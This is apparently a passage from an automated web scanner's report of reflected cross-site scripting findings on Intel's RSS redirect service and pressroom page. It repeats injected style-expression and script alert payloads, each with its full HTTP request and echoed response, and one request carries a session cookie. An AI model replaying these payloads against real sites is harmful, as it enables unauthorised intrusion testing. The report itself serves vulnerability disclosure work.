Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5 was submitted in the REST URL parameter 9. This input was echoed as dadd6"style="x:expression(alert(1))"a8ffa0511c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style%3d"x%3aexpression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31dadd6"style="x:expression(alert(1))"a8ffa0511c5/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 was submitted in the REST URL parameter 10. This input was echoed as fa91f"style="x:expression(alert(1))"6ea33654632 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style%3d"x%3aexpression(alert(1))"6ea33654632 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solutionfa91f"style="x:expression(alert(1))"6ea33654632?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80 was submitted in the REST URL parameter 2. This input was echoed as 6d862"style="x:expression(alert(1))"b65d0f7bf80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-2641026d862"style%3d"x%3aexpression(alert(1))"b65d0f7bf80/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-2641026d862"style="x:expression(alert(1))"b65d0f7bf80"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6 was submitted in the REST URL parameter 3. This input was echoed as e7b3c"style="x:expression(alert(1))"5cf453fb1b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.come7b3c"style%3d"x%3aexpression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.come7b3c"style="x:expression(alert(1))"5cf453fb1b6/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5 was submitted in the REST URL parameter 4. This input was echoed as d32af"style="x:expression(alert(1))"8b71a1cc4e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/communityd32af"style%3d"x%3aexpression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityd32af"style="x:expression(alert(1))"8b71a1cc4e5/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb38a"style%3d"x%3aexpression(alert(1))"70a761bace1 was submitted in the REST URL parameter 5. This input was echoed as eb38a"style="x:expression(alert(1))"70a761bace1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroomeb38a"style%3d"x%3aexpression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomeb38a"style="x:expression(alert(1))"70a761bace1/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5 was submitted in the REST URL parameter 6. This input was echoed as a85ab"style="x:expression(alert(1))"efed0610cc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/bloga85ab"style%3d"x%3aexpression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/bloga85ab"style="x:expression(alert(1))"efed0610cc5/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa was submitted in the REST URL parameter 7. This input was echoed as df855"style="x:expression(alert(1))"2637a52c4aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011df855"style%3d"x%3aexpression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011df855"style="x:expression(alert(1))"2637a52c4aa/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e was submitted in the REST URL parameter 8. This input was echoed as 5460e"style="x:expression(alert(1))"ca2cafebd5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style%3d"x%3aexpression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/015460e"style="x:expression(alert(1))"ca2cafebd5e/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8580"style%3d"x%3aexpression(alert(1))"1d378863169 was submitted in the REST URL parameter 9. This input was echoed as a8580"style="x:expression(alert(1))"1d378863169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style%3d"x%3aexpression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31a8580"style="x:expression(alert(1))"1d378863169/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d was submitted in the REST URL parameter 10. This input was echoed as bbebe"style="x:expression(alert(1))"66fe35fec0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style%3d"x%3aexpression(alert(1))"66fe35fec0d HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hoursbbebe"style="x:expression(alert(1))"66fe35fec0d?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccbda"style%3d"x%3aexpression(alert(1))"cd785807712 was submitted in the REST URL parameter 2. This input was echoed as ccbda"style="x:expression(alert(1))"cd785807712 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131ccbda"style%3d"x%3aexpression(alert(1))"cd785807712/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131ccbda"style="x:expression(alert(1))"cd785807712"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa199"style%3d"x%3aexpression(alert(1))"23b41b411a was submitted in the REST URL parameter 3. This input was echoed as aa199"style="x:expression(alert(1))"23b41b411a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.comaa199"style%3d"x%3aexpression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.comaa199"style="x:expression(alert(1))"23b41b411a/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046 was submitted in the REST URL parameter 4. This input was echoed as fe8c1"style="x:expression(alert(1))"fc79ab44046 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/communityfe8c1"style%3d"x%3aexpression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityfe8c1"style="x:expression(alert(1))"fc79ab44046/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc99"style%3d"x%3aexpression(alert(1))"562e67141d2 was submitted in the REST URL parameter 5. This input was echoed as acc99"style="x:expression(alert(1))"562e67141d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroomacc99"style%3d"x%3aexpression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomacc99"style="x:expression(alert(1))"562e67141d2/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37 was submitted in the REST URL parameter 6. This input was echoed as 4b96e"style="x:expression(alert(1))"93e07c87b37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog4b96e"style%3d"x%3aexpression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog4b96e"style="x:expression(alert(1))"93e07c87b37/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7 was submitted in the REST URL parameter 7. This input was echoed as 18bf7"style="x:expression(alert(1))"f7271d816f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style%3d"x%3aexpression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201118bf7"style="x:expression(alert(1))"f7271d816f7/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9 was submitted in the REST URL parameter 8. This input was echoed as 26d6b"style="x:expression(alert(1))"911c05b74a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style%3d"x%3aexpression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0226d6b"style="x:expression(alert(1))"911c05b74a9/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8768c"style%3d"x%3aexpression(alert(1))"82ed80d4031 was submitted in the REST URL parameter 9. This input was echoed as 8768c"style="x:expression(alert(1))"82ed80d4031 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style%3d"x%3aexpression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/018768c"style="x:expression(alert(1))"82ed80d4031/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-264131"> ...[SNIP]...
The value of the iid request parameter is copied into the HTML document as plain text between tags. The payload 97bc3<script>alert(1)</script>00808251755 was submitted in the iid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /pressroom/index.htm?iid=gg_about+intel_pressroom97bc3<script>alert(1)</script>00808251755 HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
